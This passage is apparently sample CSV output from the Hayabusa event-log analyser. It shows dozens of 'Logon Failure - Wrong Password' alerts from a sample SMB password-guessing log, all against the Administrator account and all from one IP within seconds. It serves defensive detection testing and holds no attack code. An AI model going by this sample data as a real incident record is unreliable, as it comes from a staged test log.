NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: 